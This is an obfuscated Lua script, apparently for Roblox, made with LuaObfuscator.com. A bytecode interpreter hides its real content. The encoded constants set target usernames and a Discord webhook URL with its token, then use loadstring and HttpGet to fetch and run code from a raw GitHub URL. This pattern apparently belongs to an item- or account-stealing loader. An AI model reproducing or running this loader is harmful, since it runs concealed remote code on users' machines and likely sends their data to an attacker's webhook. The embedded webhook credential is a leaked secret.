--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==2) then function v23()local v31=(568 -(367 + 201)) -0 ;local v32;local v33;while true do if (v31==(0 -0)) then v32,v33=v1(v16,v19,v19 + 2 );v19=v19 + (3 -1) ;v31=2 -1 ;end if (v31==(620 -(555 + (991 -(214 + 713))))) then return (v33 * (1187 -(215 + 642 + 74))) + v32 ;end end end v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (3 -0) );v19=v19 + 1 + 3 ;return (v37 * (16778093 -(282 + 595))) + (v36 * (67173 -(1523 + 114))) + (v35 * (231 + 25)) + v34 ;end v25=nil;v18=3;end if (v18==3) then function v25()local v38=v24();local v39=v24();local v40=1066 -((123 -55) + 997) ;local v41=(v21(v39,1271 -(226 + 1044) ,87 -67 ) * ((119 -(32 + 85))^(24 + 8))) + v38 ;local v42=v21(v39,21,31 + 0 );local v43=((v21(v39,8 + 24 )==(958 -(892 + 65))) and  -(2 -(998 -(915 + 82)))) or 1 ;if (v42==(0 -0)) then if (v41==(0 -0)) then return v43 * (350 -(87 + 263)) ;else local v76=0;while true do if (v76==0) then v42=2 -1 ;v40=(105 + 75) -(67 + 113) ;break;end end end elseif (v42==(1502 + (716 -171))) then return ((v41==(0 -0)) and (v43 * ((1 + 0)/(0 -0)))) or (v43 * NaN) ;end return v8(v43,v42-1023 ) * (v40 + (v41/((954 -((1989 -(1069 + 118)) + 150))^(139 -87)))) ;end v26=nil;function v26(v44)local v45=0 -0 ;local v46;local v47;while true do if (v45==(0 -0)) then v46=nil;if  not v44 then v44=v24();if (v44==(0 + 0)) then return "";end end v45=1 -0 ;end if (v45==(3 + 0)) then return v6(v47);end if (v45==(444 -(416 + 26))) then v47={};for v77=792 -(368 + (1350 -927)) , #v46 do v47[v77]=v2(v1(v3(v46,v77,v77)));end v45=3;end if (v45==(3 -2)) then v46=v3(v16,v19,(v19 + v44) -(19 -(10 + 8)) );v19=v19 + v44 ;v45=(4 + 3) -5 ;end end end v27=v24;v18=4;end if (5==v18) then v30=nil;function v30(v48,v49,v50)local v51=0;local v52;local v53;local v54;while true do if (v51==0) then v52=v48[1];v53=v48[2];v51=1;end if (v51==1) then v54=v48[3];return function(...)local v79=v52;local v80=v53;local v81=v54;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v95=0;while true do if (v95==1) then if (v92<=10) then if (v92<=4) then if (v92<=1) then if (v92>0) then do return;end else v50[v91[3]]=v89[v91[2]];end elseif (v92<=2) then v89[v91[2]]=v91[3];elseif (v92>3) then v89[v91[2]]=v91[3]~=0 ;else v89[v91[2]]();end elseif (v92<=7) then if (v92<=5) then local v112=v91[2];v89[v112]=v89[v112](v13(v89,v112 + 1 ,v84));elseif (v92>6) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else v89[v91[2]]();end elseif (v92<=8) then local v114=0;local v115;while true do if (v114==0) then v115=v91[2];v89[v115]=v89[v115](v13(v89,v115 + 1 ,v84));break;end end elseif (v92>9) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else v83=v91[3];end elseif (v92<=15) then if (v92<=12) then if (v92>11) then local v116=0;local v117;local v118;local v119;local v120;while true do if (v116==0) then v117=v91[2];v118,v119=v82(v89[v117](v13(v89,v117 + 1 ,v91[3])));v116=1;end if (v116==2) then for v169=v117,v84 do v120=v120 + 1 ;v89[v169]=v118[v120];end break;end if (v116==1) then v84=(v119 + v117) -1 ;v120=0;v116=2;end end else local v121=v91[2];local v122=v89[v91[3]];v89[v121 + 1 ]=v122;v89[v121]=v122[v91[4]];end elseif (v92<=13) then v89[v91[2]]=v91[3]~=0 ;elseif (v92==14) then local v143=v91[2];local v144=v89[v91[3]];v89[v143 + 1 ]=v144;v89[v143]=v144[v91[4]];else v83=v91[3];end elseif (v92<=18) then if (v92<=16) then v89[v91[2]]=v50[v91[3]];elseif (v92>17) then v89[v91[2]]=v50[v91[3]];else v50[v91[3]]=v89[v91[2]];end elseif (v92<=19) then local v129=0;local v130;local v131;local v132;local v133;while true do if (v129==2) then for v172=v130,v84 do v133=v133 + 1 ;v89[v172]=v131[v133];end break;end if (v129==0) then v130=v91[2];v131,v132=v82(v89[v130](v13(v89,v130 + 1 ,v91[3])));v129=1;end if (1==v129) then v84=(v132 + v130) -1 ;v133=0;v129=2;end end elseif (v92==20) then do return;end else v89[v91[2]]=v91[3];end v83=v83 + 1 ;break;end if (0==v95) then v91=v79[v83];v92=v91[1];v95=1;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v55=0 + 0 ;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if ((836 -(660 + 176))==v55) then v56=0 + 0 ;v57=nil;v55=1146 -(466 + 679) ;end if (v55==(205 -(14 + 188))) then v62=nil;v63=nil;v55=11 -7 ;end if (v55~=(676 -(534 + 141))) then else v58=nil;v59=nil;v55=1 + 1 ;end if (v55==2) then v60=nil;v61=nil;v55=3;end if ((4 + 0)~=v55) then else while true do if (v56~=(0 + 0)) then else v57=0 -0 ;v58=nil;v56=1 -0 ;end if (v56~=1) then else local v96=0;while true do if (v96~=(1 + 0)) then else v56=2;break;end if (v96==(0 -0)) then v59=nil;v60=nil;v96=2 -1 ;end end end if (v56==2) then v61=nil;v62=nil;v56=3;end if (v56==(117 -(4 + 110))) then v63=nil;while true do local v101=0 + 0 ;local v102;while true do if (v101~=(1427 -(41 + 1386))) then else v102=103 -(17 + 86) ;while true do if ((0 + 0)~=v102) then else if (v57==1) then v62=v24();v63={};for v134=1,v62 do local v135=0;local v136;local v137;local v138;local v139;local v140;while true do if (v135==1) then v138=nil;v139=nil;v135=3 -1 ;end if (v135~=(398 -(115 + 281))) then else v140=nil;while true do if (v136~=(2 -1)) then else v139=nil;v140=nil;v136=2 + 0 ;end if (v136==(166 -(122 + 44))) then v137=0 -0 ;v138=nil;v136=1 -0 ;end if (v136~=2) then else while true do if (v137~=(3 -2)) then else v140=nil;while true do if (v138==(1 + 0)) then if (v139==1) then v140=v22()~=(867 -(550 + 317)) ;elseif (v139==(3 -1)) then v140=v25();elseif (v139==3) then v140=v26();end v63[v134]=v140;break;end if (v138==(0 -0)) then local v178=0 + 0 ;local v179;while true do if (v178==(1257 -(1043 + 214))) then v179=0;while true do if (v179~=(0 -0)) then else v139=v22();v140=nil;v179=1213 -(323 + 889) ;end if ((1 -0)~=v179) then else v138=2 -1 ;break;end end break;end end end end break;end if (v137==(0 -0)) then local v175=0;while true do if (v175~=(581 -(361 + 219))) then else v137=286 -(134 + 151) ;break;end if (v175~=0) then else local v180=320 -(53 + 267) ;while true do if (v180==(1665 -(970 + 695))) then v138=0 -0 ;v139=nil;v180=1;end if (1==v180) then v175=1991 -(582 + 1408) ;break;end end end end end end break;end end break;end if (v135~=(982 -(18 + 964))) then else v136=0;v137=nil;v135=1;end end end v61[10 -7 ]=v22();v57=2;end if (v57==(2 + 0)) then local v106=0;while true do if (v106==(0 -0)) then for v159=1,v24() do local v160=0 -0 ;local v161;local v162;local v163;local v164;while true do if (v160~=2) then else while true do if ((1825 -(1195 + 629))~=v161) then else v164=nil;while true do if (v162==(0 + 0)) then local v181=0 -0 ;while true do if (v181==(242 -(187 + 54))) then v162=1;break;end if (v181==(780 -(162 + 618))) then v163=0;v164=nil;v181=1 + 0 ;end end end if (v162~=(1 + 0)) then else while true do if (v163~=(0 -0)) then else v164=v22();if (v21(v164,1,1)==(0 -0)) then local v182=0;local v183;local v184;local v185;local v186;while true do if (v182~=(2 -0)) then else while true do if (v183~=(0 + 0)) then else local v187=0;while true do if (v187==(1 + 0)) then v183=1637 -(1373 + 263) ;break;end if (v187~=(0 -0)) then else v184=v21(v164,1002 -(451 + 549) ,3);v185=v21(v164,2 + 2 ,1557 -(1126 + 425) );v187=1 -0 ;end end end if (v183~=3) then else if (v21(v185,3,4 -1 )~=(1385 -(746 + 638))) then else v186[409 -(118 + 287) ]=v63[v186[15 -11 ]];end v58[v159]=v186;break;end if (v183==2) then local v189=0 + 0 ;local v190;while true do if (v189==(0 -0)) then v190=0;while true do if (v190~=(342 -(218 + 123))) then else v183=8 -5 ;break;end if (v190==(1581 -(1535 + 46))) then local v197=0;while true do if (v197==1) then v190=1 + 0 ;break;end if (v197~=0) then else if (v21(v185,4 -3 ,1 + 0 )==(561 -(306 + 254))) then v186[1 + 1 ]=v63[v186[3 -1 ]];end if (v21(v185,1469 -(899 + 568) ,2 + 0 )~=(2 -1)) then else v186[606 -(268 + 335) ]=v63[v186[293 -(60 + 230) ]];end v197=573 -(426 + 146) ;end end end end break;end end end if (v183==(1 + 0)) then v186={v23(),v23(),nil,nil};if (v184==(1024 -(706 + 318))) then local v193=0;while true do if (v193~=(1251 -(721 + 530))) then else v186[3]=v23();v186[1275 -(945 + 326) ]=v23();break;end end elseif (v184==(4 -3)) then v186[756 -(239 + 514) ]=v24();elseif (v184==2) then v186[2 + 1 ]=v24() -((1331 -(797 + 532))^(39 -23)) ;elseif (v184~=(3 + 0)) then else local v199=0 + 0 ;local v200;while true do if (v199~=(0 + 0)) then else v200=0;while true do if (v200==(0 -0)) then v186[1205 -(373 + 829) ]=v24() -((702 -(271 + 429))^16) ;v186[4]=v23();break;end end break;end end end v183=2;end end break;end if ((1130 -(369 + 761))~=v182) then else v183=0 + 0 ;v184=nil;v182=1501 -(1408 + 92) ;end if (v182==(1087 -(461 + 625))) then v185=nil;v186=nil;v182=1290 -(993 + 295) ;end end end break;end end break;end end break;end if (v161~=0) then else local v176=0;while true do if (v176==0) then v162=0 + 0 ;v163=nil;v176=1;end if (v176~=(1 -0)) then else v161=1172 -(418 + 753) ;break;end end end end break;end if (0==v160) then v161=0 + 0 ;v162=nil;v160=1 + 0 ;end if ((1 + 0)==v160) then v163=nil;v164=nil;v160=1 + 1 ;end end end for v165=337 -(144 + 192) ,v24() do v59[v165-(1 + 0) ]=v29();end v106=1;end if (v106==(530 -(406 + 123))) then return v61;end end end v102=1 + 0 ;end if (v102~=1) then else if (v57==(0 + 0)) then local v107=1769 -(1749 + 20) ;while true do if (v107~=(1505 -(363 + 1141))) then else v60={};v61={v58,v59,nil,v60};v107=2 + 0 ;end if (v107~=(1324 -(1249 + 73))) then else v57=1 + 0 ;break;end if (v107==(0 -0)) then v58={};v59={};v107=1934 -(565 + 1368) ;end end end break;end end break;end end end break;end end break;end end end v18=5;end if (1==v18) then function v21(v64,v65,v66)if v66 then local v69=0 -0 ;local v70;while true do if (v69==(1661 -(1477 + 184))) then v70=(v64/((2 + 0)^(v65-((1002 -(938 + 63)) -0))))%((2 + 0)^(((v66-(857 -(564 + 292))) -(v65-1)) + (1 -0))) ;return v70-(v70%(2 -1)) ;end end else local v71=(306 -(81 + 163 + 60))^(v65-1) ;return (((v64%(v71 + v71))>=v71) and (1 + (1613 -(1565 + 48)))) or (476 -(41 + 435)) ;end end v22=nil;function v22()local v67=v1(v16,v19,v19);v19=v19 + 1 ;return v67;end v23=nil;v18=2;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v68)if (v1(v68,2)==79) then v20=v0(v3(v68,1,1));return "";else local v72=v2(v0(v68,16));if v20 then local v93=v5(v72,v20);v20=nil;return v93;else return v72;end end end);v21=nil;v18=1;end end end v15("LOL!0C3O00028O00026O00F03F03093O00557365724E616D6532030D3O006A616D65732O67616D696E6761030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030A3O00597572696531365F313303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133363137393336343031353339343834362F744A43385539724D423437434E4C6E432D6C4C6A6D584A566745533138567446422O73667662516266566266686D5A742D334358674267706361495F614B654E7371617A00173O0012153O00013O00260A3O000E000100020004093O000E0001001215000100043O001211000100033O002O12000100053O002O12000200063O00200B000200020007001215000400084O000D000500014O000C000200054O000500013O00022O00030001000100010004093O0016000100260A3O0001000100010004093O000100010012150001000A3O001211000100093O0012150001000C3O0012110001000B3O0012153O00023O0004093O000100012O00143O00017O00",v9(),...);
